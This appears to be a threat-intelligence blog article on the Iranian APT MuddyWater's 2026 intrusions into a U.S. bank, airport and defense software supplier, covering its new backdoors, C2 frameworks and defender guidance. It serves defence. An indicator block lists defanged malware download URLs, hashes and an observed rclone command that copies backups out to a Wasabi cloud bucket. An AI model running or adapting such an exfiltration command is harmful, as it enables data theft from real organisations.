Threat Intelligence

Already Inside: How Iran's MuddyWater APT Quietly Embedded Itself in U.S. Critical Infrastructure

NH
NoHackie
March 2026 22 min read

While the world was watching missiles, Iran's persistent hacking group was already on the inside. Researchers confirmed in early March that MuddyWater—the Iranian state-sponsored APT linked to the country's intelligence ministry—has been quietly embedded in the networks of a U.S. bank, a U.S. airport, a defense software company, and a Canadian nonprofit since at least February 2026. The campaign did not begin after the military strikes. It was running long before them.

The disclosure landed on March 5, 2026, via an intelligence report from Broadcom's Symantec and Carbon Black Threat Hunter Team. The timing made headlines because it coincided with the aftermath of a U.S.-Israeli military operation—codenamed Operation Epic Fury by the U.S. and Operation Roaring Lion by Israel—that killed Iran's Supreme Leader Ayatollah Ali Khamenei. But the more unsettling detail buried in the report is that MuddyWater's presence on these U.S. networks predates any of that by weeks. The group was not reacting to the strikes. It was already positioned.

This article pulls together the technical disclosures, the broader operational picture, and the historical pattern of behavior that makes this campaign worth understanding in full. The combination of new custom malware, cloud-based exfiltration attempts, AI-assisted development, exposed operational infrastructure, and an explicit link between cyber reconnaissance and physical strikes tells a story that goes well beyond a typical espionage operation.

Who Is MuddyWater / Seedworm?

Before getting into the specifics of the 2026 campaign, it helps to understand exactly who this group is and why they have been on researchers' radar for nearly a decade.

MuddyWater operates under a constellation of names across different threat intelligence vendors: Seedworm, Static Kitten, Mango Sandstorm, Mercury, Temp Zagros, TA450, Earth Vetala, MUDDYCOAST, Boggy Serpens, Cobalt Ulster, and Yellow Nix, among others. Independent researchers and MITRE ATT&CK trace the group's activity back to at least 2017. A 2022 joint advisory from the FBI, CISA, U.S. Cyber National Mission Force, the NSA, and the UK's National Cyber Security Centre formally attributed MuddyWater to Iran's Ministry of Intelligence and Security (MOIS), describing the group as a subordinate element operating within that structure and noting it had conducted broad cyber campaigns on MOIS's behalf since approximately 2018.

The group started with a relatively narrow focus on Middle Eastern targets—telecommunications companies, government ministries, and oil and gas organizations. Over time, that scope expanded significantly to include organizations across Asia, Africa, Europe, and North America, spanning sectors that include defense, local government, critical infrastructure, academic institutions, and financial services.

What makes MuddyWater operationally significant is not just the breadth of its targets but its tooling philosophy. The group is known for developing its own custom malware while simultaneously using legitimate administrative tools—a technique defenders call "living off the land"—to blend in with normal network traffic. Tools like PowerShell, Remote Desktop Protocol, screen capture utilities, and commercial remote monitoring tools like SimpleHelp and ConnectWise appear regularly across MuddyWater intrusions, making attribution and detection considerably harder.

Iran's broader cyber capabilities add important context here. UltraViolet Cyber, a practitioner-led MSSP, assessed in March 2026 that Iran's cyber operations have become a reliable tool for intelligence gathering, regional influence, and strategic messaging during periods of geopolitical tension. That is the framing that matters. MuddyWater is not a loosely affiliated hacktivist collective. It is a structured intelligence operation, and its campaigns are designed to serve strategic objectives, not score points on social media.

The 2026 U.S. Campaign: What Was Discovered

The Symantec and Carbon Black Threat Hunter Team published their findings on March 5, 2026, after a third party shared indicators of compromise linked to MuddyWater. According to senior intelligence analyst Brigid O Gorman, one of those indicators led the team to uncover the broader cluster of attacks and identify additional malware.

The confirmed list of affected organizations includes a U.S. bank, a U.S. airport, the Israeli branch of a software company that supplies technology to the defense and aerospace industries, a U.S.-based non-governmental organization, and a Canadian non-profit organization. The names of the affected organizations were not disclosed.

The activity began in early February 2026—weeks before the U.S.-Israeli strikes on Iran at the end of the month. Activity continued in the days following the strikes, meaning the group did not pause or go quiet after the military escalation. It kept operating.

Attribution Note

The FBI, CISA, NSA, and UK NCSC have formally attributed MuddyWater to Iran's MOIS. The Symantec and Carbon Black team confirmed attribution in this campaign through certificate reuse linking new malware samples to previously confirmed MuddyWater tooling. Microsoft and Kaspersky independently detected samples associated with the Stagecomp and Darkcomp malware families using MuddyWater-linked signatures. The SHA-256 hash for the Dindoor backdoor has been published publicly: 0f9cf1cf8d641562053ce533aaa413754db88e60404cab6bbaa11f2b2491d542.

Researchers said the Israeli branch of the defense software company appeared to be the primary target, with other organizations potentially serving as staging grounds or secondary intelligence objectives. The software company's U.S. and Israeli operations both showed signs of intrusion, raising questions about whether the attackers were pursuing supply chain access—compromising the vendor in order to reach its government and defense clients downstream.

On the question of exfiltration, researchers identified a concrete attempt to copy data from the software company's systems using Rclone, a legitimate file-transfer utility, pointed at a Wasabi cloud storage bucket. Symantec noted in their report that it remains unclear whether the exfiltration attempt succeeded. Symantec also stated that the observed activity has been disrupted, but warned that other organizations may still be vulnerable to compromise. The use of a commercial cloud storage provider for data staging is a deliberate evasion technique—traffic to Wasabi blends in with normal enterprise cloud activity far more easily than traffic to a suspicious IP address.

The initial access vector remains unknown. The Symantec and Carbon Black team confirmed they do not know how MuddyWater gained entry to the affected networks. O Gorman told The Register that the group typically uses phishing emails or exploits in public-facing applications. Both vectors should be assumed operational until defenders confirm otherwise.

The New Malware: Dindoor, Fakeset, and a Rapidly Expanding Toolkit

The technical centerpiece of this campaign is a previously unknown backdoor that Symantec and Carbon Black named Dindoor. Understanding what makes it distinctive requires a look at how it was built and how it is tied back to MuddyWater's established infrastructure.

Dindoor

Dindoor was found on the networks of the Israeli software company, the U.S. bank, and a Canadian non-profit. The backdoor uses Deno—a modern, secure runtime for JavaScript and TypeScript—for execution. This is an unconventional choice. SC Media noted that this reliance on Deno and Python runtimes suggests MuddyWater is shifting toward cross-platform, living-off-the-land approaches to bypass traditional endpoint detection. Using Deno gives the backdoor a degree of novelty that can complicate detection by security tools tuned to familiar patterns.

The backdoor was signed with a digital certificate issued to "Amy Cherne." Certificate signing is significant because it grants the malware a veneer of legitimacy—signed code is less likely to trigger immediate security alerts on systems configured to trust signed binaries.

Fakeset

A second, separate Python-based backdoor called Fakeset was found on the networks of the U.S. airport and a U.S. non-profit. It was signed with certificates issued to "Amy Cherne" and "Donald Gay." The Donald Gay certificate is the critical attribution link: it had previously been used to sign Stagecomp and Darkcomp malware, both of which have been linked to MuddyWater by Google, Microsoft, and Kaspersky. Fakeset was downloaded from servers belonging to Backblaze, another commercial cloud storage provider—the same evasion logic as the Wasabi exfiltration attempt. Legitimate cloud infrastructure, blended traffic.

The split in tooling across victim categories is precise and deliberate. Dindoor was deployed against the Israeli software company arm, the U.S. bank, and the Canadian nonprofit. Fakeset was deployed against the U.S. airport and the U.S.-based nonprofit. The operational decision to use different backdoors across different target categories within the same campaign may reflect organizational compartmentalization inside MuddyWater—different sub-teams or working groups handling different objectives—or a deliberate strategy to impede cross-victim correlation by security researchers. Defenders looking for only one backdoor will miss the other half of the campaign.

The reuse of signing certificates across Fakeset, Stagecomp, and Darkcomp provided the attribution thread that linked the new campaign to Seedworm—even where the specific malware families had not previously been seen on the targeted networks. — Symantec and Carbon Black Threat Hunter Team, March 2026, as reported by The Register (source) 
# Fakeset download infrastructure observed by researchers
# Backdoor retrieved from Backblaze commercial cloud servers:
#   hxxps://gitempire.s3.us-east-005.backblazeb2[.]com
#   hxxps://elvenforest.s3.us-east-005.backblazeb2[.]com
#
# Certificate "Donald Gay" - previously linked to:
#   Stagecomp malware (MuddyWater, confirmed by Google/Microsoft/Kaspersky)
#   Darkcomp backdoor (MuddyWater, confirmed)
# Certificate "Amy Cherne" - used across both Dindoor and Fakeset
#
# Dindoor hashes (Trojan.Dindoor):
# 0f9cf1cf8d641562053ce533aaa413754db88e60404cab6bbaa11f2b2491d542
# c7cf1575336e78946f4fe4b0e7416b6ebe6813a1a040c54fb6ad82e72673478e
#
# Fakeset hashes (Trojan.Fakeset) - select samples published by Broadcom/Symantec:
# 077ab28d66abdafad9f5411e18d26e87fe43da1410ee8fe846bd721ab0cb52de
# 15061036c702ad92b56b35e42cf5dc334597e7311e98d2fdd3815a69ac3b1d84
# 2b7d8a519f44d3105e9fde2770c75efb933994c658855dca7d48c8b4897f81e6
# 4aef998e3b3f6ca21c78ed71732c9d2bdcc8a4e0284f51d7462c79d446fbc7be
# 64263640a6fdeb2388bca2e9094a17065308cf8dcb0032454c0a71d9b78327eb
#
# Rclone exfiltration command observed:
# rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[REMOVED]:/192.168.0.x
#
# Source: Broadcom/Symantec Threat Hunter Team (security.com), March 2026

Certificate reuse is a double-edged sword for threat actors. It simplifies operations and allows signed binaries to bypass certain endpoint controls, but it also creates a persistent attribution thread. Once researchers identify a certificate linked to a known actor, every future sample signed with that certificate becomes a data point—regardless of whether the malware family is entirely new. MuddyWater's continued reuse of the Amy Cherne and Donald Gay certificates suggests the group calculated that operational efficiency outweighed the detection risk. That calculus may change as more defenders add these certificates to watchlists.

Operation Olalampo: A Parallel Campaign Already in Motion

The U.S. infrastructure campaign does not exist in isolation. MuddyWater has been running a parallel, highly active campaign targeting organizations across the Middle East and North Africa (MENA) region, which Group-IB formally named Operation Olalampo.

Group-IB first observed Olalampo on January 26, 2026, and published a detailed technical analysis in February. The campaign deployed four new malware families, each serving a distinct role in a modular attack chain. This is worth paying attention to because the tooling in Olalampo overlaps structurally with the U.S. campaign—they share the same operational DNA, even when the specific binaries differ.

The first stage is GhostFetch, a downloader that profiles the victim system before doing anything else—checking for mouse movement, screen resolution, debuggers, virtual machines, and installed antivirus products. If the environment looks like a sandbox, GhostFetch stops. If it looks real, it fetches and executes secondary payloads directly in memory to avoid leaving files on disk. GhostBackDoor follows as the second-stage implant, offering an interactive shell with file read and write capabilities and the ability to re-launch GhostFetch if needed, enabling the attackers to refresh their foothold.

HTTP_VIP is a native downloader that conducts system reconnaissance and connects to an external server to authenticate before deploying AnyDesk—a legitimate remote administration tool—from the command-and-control server. Using AnyDesk for persistence is a classic living-off-the-land technique. It is a real application that many organizations use legitimately, which makes its presence far harder to flag as malicious.

The fourth component is CHAR, a Rust-based backdoor with a particularly unusual command-and-control mechanism: it is controlled through a Telegram bot named "stager_51_bot" with the display name "Olalampo." Telegram-based C2 infrastructure is increasingly common among Iranian threat actors because it routes traffic through a legitimate, encrypted platform that is difficult to block without significant collateral impact on normal communications. CHAR shares a similar structure and development environment with the Rust-based malware BlackBeard (also tracked as Archer RAT and RUSTRIC), which CloudSEK and Seqrite Labs previously identified as another MuddyWater tool targeting Middle Eastern organizations.

Group-IB's assessment of Operation Olalampo concluded that MuddyWater's continued integration of AI tools alongside new custom malware families signals an intent to broaden its operational reach, not consolidate it. The group is developing custom tooling in parallel with rapid adoption of public exploit code, deploying both at scale. — Group-IB Threat Intelligence Team, Operation Olalampo analysis, February 2026 (source)

The Group-IB team made a particularly striking observation about CHAR: analysis of its source code revealed debug strings containing emojis, which researchers interpret as evidence of AI-assisted development. This is not as speculative as it might sound. Google had previously disclosed that MuddyWater was experimenting with generative AI tools to assist malware development. Group-IB identified four distinct instances of this pattern and noted that the operators apparently failed to sanitize the debug strings before compilation. The presence of emoji artifacts in debug strings is a known fingerprint of large language model output when used for code generation—LLMs include them naturally in ways that human developers typically do not.

Group-IB also gained an unusual window into MuddyWater's operational methods by monitoring the Telegram bot used in the campaign. Bot logs revealed that the threat actor had tested the CHAR backdoor on their own machine prior to deployment, with usernames "DontAsk" and "Jacob" visible in the artifact trail. The hostname was desktop-9524r2b—an ordinary-sounding machine, not a hardened operations server. The same "Jacob" username appeared in Rust library paths consistent with the BlackBeard malware attributed to MuddyWater. These operational security failures are rare gifts for defenders and researchers, and they strengthened attribution confidence significantly.

The Telegram bot's activity also exposed limited historical usage dating to late 2025, indicating infrastructure reuse rather than a new standalone operation. This is a pattern: MuddyWater builds persistent infrastructure and recycles it across campaigns, which means burned indicators from Olalampo may help detect activity across other campaigns the group is running simultaneously.

The Exposed Infrastructure: What Ctrl-Alt-Intel Found

While Symantec and Group-IB were tracking the malware, an independent threat intelligence collective called Ctrl-Alt-Intel took a different approach. They went hunting for exposed MuddyWater infrastructure—and found it.

Ctrl-Alt-Intel identified and dumped C2 tooling, scripts, logs, victim data, and operational artifacts from a VPS hosted in the Netherlands that they attributed to MuddyWater with high confidence. The exposure was not the result of a law enforcement operation or a vendor disclosure. It was the result of repeated operational security failures by MuddyWater's own operators, which allowed researchers to pivot using Hunt.io and identify additional related infrastructure.

What they found inside paints a broader operational picture than any single vendor report has provided. The server contained three distinct custom-developed C2 frameworks. The first, which Ctrl-Alt-Intel named KeyC2, is a Python-based framework operating over UDP on port 1269 that handles command execution, file transfer, and dynamic C2 migration. The second, PersianC2, uses HTTP polling with a dashboard interface and configurable sleep timers for staging operations. The third—ArenaC2—is an HTTP-based framework using FastAPI and AES-256-CBC encryption that presented a decoy landing page disguised as a multilingual news site called "ArenaReport" when visited through a browser, complete with animated backgrounds and content in English, French, and German, specifically designed to fool automated scanners and casual inspection.

The server also hosted what Ctrl-Alt-Intel called a "Tsundere Botnet"—a Node.js-based implant that uses Ethereum smart contracts for command-and-control. Rather than beaconing to a static server address, the botnet resolves its C2 address by querying a smart contract on the Ethereum blockchain. This technique makes infrastructure takedown extremely difficult: there is no server to seize or domain to sinkhole when the command address lives on a decentralized ledger. Researchers at Kaspersky had independently documented the Tsundere botnet architecture in November 2025 in a separate context, but the Ctrl-Alt-Intel findings mark its first confirmed appearance in a MuddyWater operation.

For network pivoting, MuddyWater operators were observed using Neo-reGeorg, resocks, and revsocks (SOCKS and WebSocket tunneling tools) after dropping webshells onto a compromised Exchange server in Portugal—a reminder that MuddyWater's European targeting is not hypothetical. Exfiltration channels extended beyond Wasabi to include put.io and an Amazon EC2 instance, giving the operators multiple fallback paths for data removal.

The victim data recovered from the exposed server revealed targeting of Israeli organizations spanning healthcare, hosting, immigration, and intelligence sectors. EgyptAir was among the targeted entities—researchers recovered copies of passports, visa documents, and financial files from the server—along with Jordanian government webmail, various UAE companies, U.S. entities, and Jewish- and Israeli-linked non-governmental organizations. Ctrl-Alt-Intel also found evidence that MuddyWater had compromised the Iranian marketplace BaSalam—consistent with the MOIS's documented mandate for domestic surveillance, and a reminder that the Iranian regime's cyber operations target their own population in addition to foreign adversaries.

The exposed infrastructure showed exploitation of over a dozen CVEs, including novel SQL injection vulnerabilities. MuddyWater was observed scanning for targets vulnerable to CVE-2026-1281, an Ivanti EPMM vulnerability, using Nuclei—a widely used vulnerability scanning framework. They also conducted password spraying against Outlook Web Access and SMTP services. Ctrl-Alt-Intel concluded that what stood out in this operation was not the sophistication of any single tool, but the operational breadth: countless organizations targeted across multiple continents, running in parallel across three distinct C2 frameworks simultaneously.

Why This Matters for Defenders

The Ctrl-Alt-Intel findings are significant because they reveal the scale of concurrent MuddyWater operations. The U.S. bank, airport, and software company intrusions disclosed by Symantec are not isolated incidents. They are part of a much wider campaign that spans multiple continents, multiple C2 frameworks, and multiple victim categories running in parallel. Defenders looking only at the Dindoor and Fakeset indicators are seeing a fraction of the threat surface.

The CCTV Precedent: When Cyber Reconnaissance Feeds Kinetic Strikes

The concern about MuddyWater's current accesses in U.S. infrastructure is not abstract. It is grounded in what the group did with its access in 2025, and what that history says about the potential use of current footholds.

In May 2025, MuddyWater compromised a server containing live CCTV streams from cameras across Jerusalem. The group used that access to surveil the city, monitoring movements and locations of potential targets. On June 23, 2025, Iran launched widespread missile attacks against Israel, including Jerusalem. On the same day, the Israel National Cyber Directorate publicly disclosed that Iranian forces had been exploiting compromised security cameras to assess where missiles hit and improve their targeting precision.

This is not a hypothetical or theoretical risk. It happened. Cyber access translated directly into targeting data for kinetic strikes. A compromised camera network became a battlefield intelligence system.

The connection between cyber compromise and kinetic consequences went even further during the February 2026 strikes. The Financial Times reported that Israeli intelligence agencies had hacked into Tehran's extensive traffic camera network for years to monitor the movements of bodyguards belonging to Khamenei and other top officials—surveillance that reportedly helped enable the airstrike that killed the Supreme Leader. Cyber access feeding kinetic targeting is no longer a one-directional threat. It is the operating model on both sides of this conflict.

"Even if the motive wasn't disruption originally, it's possible that groups such as Seedworm could pivot in response to the war and launch disruptive attacks on organizations they've already compromised. Already having a presence on US and Israeli networks prior to the current hostilities beginning places the threat group in a potentially dangerous position to launch attacks." — Brigid O Gorman, Senior Intelligence Analyst, Symantec and Carbon Black, as reported by The Register, March 2026 (source)

That assessment should be read carefully. O Gorman is not speculating about whether MuddyWater could theoretically pivot to destructive operations. She is saying they are already positioned to do so, right now, on networks they have had access to since February. The gap between intelligence gathering and disruption is a policy decision, not a technical obstacle.

The airport intrusion deserves particular attention in this context. Airports are complex operational technology environments. They run industrial control systems for luggage handling, fuel management, runway lighting, and ground communications. An adversary with persistent access to an airport network is not just sitting on email servers. Depending on network segmentation, they may have pathways toward operational systems that have very direct physical consequences.

Why This Campaign Is More Dangerous Than It Looks

Taken individually, the technical components of this campaign are consistent with what MuddyWater has done before: custom malware, living-off-the-land tools, phishing or public-facing application exploitation for initial access, and data exfiltration attempts staged through commercial cloud providers. None of that is novel in isolation.

What makes the current situation more dangerous is the convergence of several factors happening simultaneously.

First, the geopolitical context has removed the normal constraints on escalation. A U.S.-Israeli military operation that killed Iran's Supreme Leader and at least 40 senior officials is not a minor provocation. It is the kind of event that historically triggers sustained, retaliatory cyber campaigns. MuddyWater was already positioned before the strikes. The question now is whether it holds, expands, or pivots. BeyondTrust's threat advisory noted that the elimination of Iran's senior leadership has not neutralized its cyber capability—it has likely decentralized it, with pre-positioned proxy groups now operating in what researchers assessed as the highest-motivation environment in their recorded history.

Second, the broader Iranian cyber ecosystem has activated at scale. Palo Alto Networks' Unit 42 reported approximately 60 hacktivist groups active as of March 2, 2026, including pro-Russian groups joining in support of Iran. CloudSEK documented over 150 hacktivist incidents between February 28 and March 1 alone. According to Flashpoint, a massive #OpIsrael cyber campaign involving pro-Russian and pro-Iranian actors has targeted Israeli industrial control systems and government portals across Kuwait, Jordan, and Bahrain. The campaign involves groups including NoName057(16), Handala Hack, Fatemiyoun Electronic Team, and the Cyber Islamic Resistance. Pro-Russian hacktivist group Z-Pentest claimed compromises of U.S. industrial control systems and SCADA networks between February 28 and March 2. MuddyWater's quiet, persistent campaign sits inside a much louder and more chaotic threat landscape, which makes detection harder for defenders already overwhelmed with signal.

Third, the supply chain angle of the software company compromise has not received enough attention. The targeted firm supplies technology to defense and aerospace industries. If attackers can use their presence on the vendor's network to push malicious code or credentials upstream to government and defense clients, the blast radius of this intrusion expands dramatically beyond the named organizations. This is the same category of risk as SolarWinds: a trusted vendor becomes a vector into protected networks.

Fourth, the tooling has matured significantly. The Rust-based CHAR backdoor, AI-assisted development artifacts, Telegram-based C2, Ethereum smart contract infrastructure, multiple parallel C2 frameworks, and the modular architecture of Operation Olalampo are not the work of a group still finding its footing. MuddyWater in 2026 is a substantially more capable actor than MuddyWater in 2018. As ESET noted in late 2025, the group's recent upgrades—including memory-only loaders, custom backdoors, and advanced defense evasion techniques—represented a significant departure from its historically noisier operational style. The group's willingness to invest in new malware families while maintaining operational continuity across campaigns demonstrates an institutional sophistication that pure criminal groups rarely achieve.

Fifth, there is an additional Rust-based malware family in play. Rescana identified what they call RustyWater, a remote access trojan targeting Israeli government, military, financial, telecommunications, and maritime organizations. RustyWater uses spear-phishing with Hebrew-language decoy documents, establishes persistence through registry modifications, and communicates with C2 servers over HTTP/HTTPS using domains mimicking legitimate services. This means defenders need to track not just the Symantec-disclosed tooling, but an expanding ecosystem of Rust-based implants that MuddyWater is deploying across multiple campaigns simultaneously.

Separately, a campaign beginning in August 2025 and published by Group-IB in October saw MuddyWater use a compromised legitimate mailbox to distribute the Phoenix backdoor to more than 100 government entities across the MENA region. A Chromium-based credential stealer disguised as a calculator application was also part of that toolkit. The credential theft angle matters because stolen credentials from one campaign become initial access for the next one—the group has a documented pattern of recycling and building on prior intrusions.

Sixth, U.S. cyber defense capacity is under strain at precisely the wrong moment. CISA—the federal agency responsible for tracking and alerting the public to threats like MuddyWater—has been operating with sharply reduced staffing due to a funding lapse. Congressional leaders and cybersecurity experts have warned publicly that this is a dangerous time for the nation's cyber defense agency to be running at reduced capacity. The Iranian cyber threat does not wait for staffing levels to recover.

What Defenders Should Actually Do Differently

Standard defensive checklists—patch your systems, run phishing simulations, monitor for indicators of compromise—are necessary but insufficient for an intrusion of this maturity and scope. MuddyWater has had weeks of dwell time in these environments. Standard prevention advice addresses a threat actor that is still trying to get in. This threat actor is already inside. The defensive posture needs to match that reality.

  1. Assume compromise and hunt backward from persistence, not forward from initial access. The initial access vector is still unknown. That means prevention-focused controls like patching and phishing awareness, while critical, cannot be your primary response. The priority is hunting for evidence that persistence has already been established. Look for newly created services (MuddyWater has used service names like "MicrosoftVersionUpdater" in Olalampo), modified startup folder registry paths, and unauthorized remote administration tools. Hunt for evidence of Deno runtime or Python interpreters in locations where they were not previously installed.
  2. Monitor for legitimate tools used maliciously—and build behavioral baselines to distinguish them. Rclone appearing in an environment that does not use it is a meaningful indicator. Unexpected AnyDesk installations, Plink usage, or outbound connections to Backblaze or Wasabi from systems that have no business reason to use them are all worth investigating. But simple blocklisting is not enough when the adversary uses tools your own teams might use. Build behavioral baselines: which machines normally use remote administration tools, which users normally transfer files to cloud storage, and which processes normally execute JavaScript runtimes. Anomalies against that baseline are your signal.
  3. Certificate and hash-based indicators should be deployed immediately, but understood as perishable. The Dindoor backdoor hash is publicly published. The certificate names "Amy Cherne" and "Donald Gay" should be added to watchlists. Backblaze download URLs from gitempire and elvenforest subdomains are published IOCs. Known MuddyWater infrastructure IPs documented by Ctrl-Alt-Intel, Group-IB, and Symantec should be incorporated into threat intelligence feeds. But recognize that a group operating multiple parallel C2 frameworks will rotate infrastructure. These indicators catch yesterday's operation. Behavioral detection catches tomorrow's.
  4. Network segmentation must be validated, not assumed. If operational technology networks are reachable from IT networks, the risk profile of this campaign escalates dramatically. Lateral movement from a compromised email server to a SCADA environment is possible in flat networks. For airports, utilities, defense suppliers, and financial institutions, this is not a theoretical concern—the CCTV precedent from 2025 demonstrates exactly how cyber access translates to physical consequences. Conduct segmentation validation testing, not just architecture review. Verify that the boundaries hold under adversary conditions, not just under normal operations.
  5. Implement cloud exfiltration monitoring with explicit attention to commercial storage providers. The use of Wasabi and Backblaze for staging and delivery is deliberate. Organizations should have visibility into which commercial cloud storage platforms their systems communicate with and flag anomalous transfers, especially involving archive creation followed by outbound upload. Consider implementing data loss prevention rules specifically for known cloud storage endpoints that are not part of your sanctioned toolset. Monitor for Rclone command-line usage patterns, particularly targeting external buckets.
  6. Monitor for Telegram and blockchain-based C2 traffic. The CHAR backdoor's use of Telegram for command-and-control, and the Tsundere Botnet's use of Ethereum smart contracts, represent C2 channels that many enterprise detection stacks are not configured to identify. Telegram API traffic from server environments, and unexpected Ethereum RPC connections from endpoints, should be treated as anomalous. These are not typical IOCs—they are behavioral patterns that require specific detection logic.
  7. Prioritize identity security and credential hygiene. MuddyWater's operational playbook consistently includes credential harvesting, password spraying, and reuse of stolen credentials across campaigns. The Chromium-based credential stealer found in their October 2025 toolkit targets Chrome, Edge, Brave, and Opera. Enforce multi-factor authentication across all remote access. Audit for password reuse. Review whether service accounts have been added or modified without authorization. Assume that credentials harvested in one campaign will be tested against your environment in the next.
  8. Engage in threat intelligence sharing, not just consumption. The Ctrl-Alt-Intel findings demonstrate the value of active hunting for adversary infrastructure. If your organization discovers indicators linked to MuddyWater or related Iranian APTs, sharing them through ISACs, CISA, or trusted intelligence-sharing communities accelerates detection for everyone. MuddyWater operates at scale across dozens of organizations simultaneously. Isolated defense is insufficient against a campaign of this breadth.
  9. Treat IoT devices and networked cameras as part of your core security perimeter. The CCTV precedent from 2025 is not a one-time anomaly. Field Effect's analysis of the broader Iranian cyber campaign confirms that multiple IRGC-linked groups have been systematically compromising camera networks in Israel, Iraq, and Gulf states through unpatched firmware, weak credentials, and exposed interfaces. If your organization operates physical security systems, building management systems, or any IoT-adjacent infrastructure, these devices must be inventoried, segmented, and monitored the same way your servers are. An adversary with access to your camera network has access to physical intelligence, and depending on network architecture, may have a path into adjacent systems.
  10. Perform adversary simulation against your current detection stack, not last year's. The specific evasion techniques in this campaign—Deno runtime, Ethereum-based C2, Telegram C2, cloud storage exfiltration to commercial providers, use of signed binaries—each represent a category of detection gap that many enterprise security stacks are not configured to address. Running tabletop exercises against a MuddyWater-style intrusion (initial access via unknown vector, custom signed backdoor, cloud-native exfiltration, blockchain C2 resolution) would expose specific gaps in your environment before a real intrusion does. Purple team exercises using the published Olalampo and Dindoor TTPs are a concrete action organizations can take now that goes well beyond adding IOCs to a feed.

The Questions That Are Not Being Asked

The public reporting on this campaign has focused primarily on the malware, the certificates, and the geopolitical context. That reporting is accurate and valuable. But several important questions are conspicuously absent from the conversation.

Why is a Canadian nonprofit on this target list? The inclusion of a Canadian nonprofit in the same campaign as a U.S. bank, a U.S. airport, and a defense software supplier raises a question no public reporting has addressed. Canadian nonprofits linked to Jewish community organizations, Middle Eastern diaspora advocacy, or Iran-related human rights work are documented MOIS targets—the ministry has a pattern of surveilling and disrupting diaspora communities outside Iran. Alternatively, a Canadian nonprofit may have been targeted for lateral access into the networks of partner organizations, donors, or government contacts it maintains. The selection is not random. MOIS targets with purpose, and understanding why this particular organization was selected would illuminate the operational objective behind the entire campaign in a way the more headline-grabbing bank and airport victims do not.

What does "disrupted" actually mean? Symantec and Carbon Black stated that the observed activity has been disrupted. No public reporting has defined what disruption entailed. Were the backdoors removed? Were affected organizations' networks isolated or reimaged? Were the Backblaze and Wasabi buckets used for C2 and exfiltration taken offline? Were all affected organizations notified, or only those the research team directly identified? Disruption of observed activity is not the same as eviction of the threat actor. A group that has had weeks of dwell time may have established persistence mechanisms that were not discovered before the disclosed backdoors were remediated. The gap between "we disrupted this activity" and "these networks are clean" can be substantial.

How many other organizations are compromised but have not yet been identified? Symantec and Carbon Black discovered this campaign because a third party shared an indicator that led them to it. That is a reactive discovery process. MuddyWater has been operating for weeks. The Ctrl-Alt-Intel findings show a victim list far broader than what Symantec disclosed. There is no reason to believe the known victims represent the full scope of compromise.

What is the strategic significance of the Deno runtime choice? The selection of Deno—rather than Python, PowerShell, or Node.js—for the Dindoor backdoor is technically deliberate and deserves more scrutiny than it has received. Deno is a modern JavaScript and TypeScript runtime that enforces explicit permission grants for filesystem access, network access, and environment variable access, running sandboxed by default. But that same modern design means it is far less commonly monitored by enterprise endpoint detection platforms. Detection rules, behavioral baselines, and SIEM signatures are built around known adversary tooling. Deno's relative obscurity in enterprise environments means an unexpected Deno process on a corporate system may not generate an alert in organizations that have not specifically hunted for it. The choice signals something about MuddyWater's detection-evasion research process: the group is actively identifying and exploiting gaps in what defenders are watching for.

What happens to these accesses if the conflict escalates further? O Gorman's stated concern—that MuddyWater could pivot to disruptive attacks on already-compromised networks—is the critical strategic question. Iran's cyber operations have historically been designed to maintain optionality: gather intelligence, build access, and decide later whether to use it for espionage or disruption. The CCTV-to-airstrike example from 2025 demonstrated that this optionality is real and has already been exercised. But the public conversation has not grappled with what disruption of a U.S. airport or a bank's operational systems would actually look like, or what policy frameworks exist to deter it.

What is the supply chain exposure from the compromised defense software company? A vendor that supplies technology to defense and aerospace clients, with operations in both the U.S. and Israel, represents a high-value pivot point. If MuddyWater has access to code repositories, build systems, or update mechanisms, the downstream exposure extends far beyond the vendor's own network. The public reporting has noted the supply chain risk in passing but has not addressed whether downstream clients have been notified, whether code integrity reviews are underway, or whether the vendor has engaged incident response capabilities commensurate with the risk.

Are U.S. defensive institutions resourced to respond at the scale required? CISA's reduced staffing is not just a Washington policy story. It has direct operational consequences for the organizations that depend on the agency's alerts, advisories, and coordination during periods of heightened threat activity. The Iranian cyber ecosystem has activated at a scale not seen before. Whether U.S. defensive capacity can match that scale is an open question that deserves honest discussion.

What role does Iran's internet blackout play in the timeline of cyber operations? Iran's internet connectivity dropped to between 1 and 4 percent beginning February 28, 2026, according to Palo Alto Networks' Unit 42 assessment. That connectivity loss likely hinders state-aligned operators based inside Iran from coordinating sophisticated attacks in the near term. But MuddyWater's pre-positioned accesses on U.S. and Israeli networks were established before the blackout. Backdoors that are already beaconing do not require the operator to be sitting in Tehran. And as Unit 42 noted, geographically dispersed operators and proxy groups may be operating independently under delegated authority.

Is there a coordination layer between MuddyWater and the hacktivist groups operating simultaneously? The public reporting treats MuddyWater's quiet persistent campaign and the loud hacktivist noise from groups like Handala Hack, NoName057(16), and the Fatemiyoun Electronic Team as parallel phenomena. But MOIS and IRGC-linked operations have historically used hacktivist-branded groups as operational fronts. The simultaneous activation of a sophisticated, persistent espionage campaign and a high-volume, noisy hacktivist campaign creates an almost ideal information environment for the quiet campaign: defenders overwhelmed with DDoS alerts and defacement claims are less likely to prioritize the slow, patient intrusion that has been running since February.

The disclosure of this campaign is significant, but it is not the end of the story. MuddyWater has continued operating through military escalations, diplomatic crises, and public attribution for nearly a decade. A public report naming its tools does not close an intrusion—it starts a new phase of the investigation. For organizations in sectors that overlap with this group's known targeting priorities, the time to be searching for these indicators is now, not after a disruptive event makes the question urgent.

The accesses established in early February 2026 represent the same optionality Iran has always pursued with its cyber operations—gather intelligence, build access, and decide later whether to use it for espionage or destruction—applied to a bank, an airport, a defense software supplier, and a Canadian nonprofit, in the middle of an active military conflict. The technical details matter for detection. But the strategic picture is what should be driving urgency.

Sources referenced in this article:
Symantec / Carbon Black Threat Hunter Team via Security.comThe RegisterThe Hacker NewsGroup-IB (Operation Olalampo)Group-IB (Phoenix Backdoor)Ctrl-Alt-IntelRescana (RustyWater)Palo Alto Networks Unit 42CloudSEKUltraViolet CyberBeyondTrustSentinelOneHelp Net SecuritySC MediaDark ReadingESET (MuddyViper)Infosecurity Magazine / Google GTIGNextgov/FCWCSISKaspersky (Tsundere Botnet)Field Effect (IoT/Camera analysis)MITRE ATT&CK (G0069)

← all articles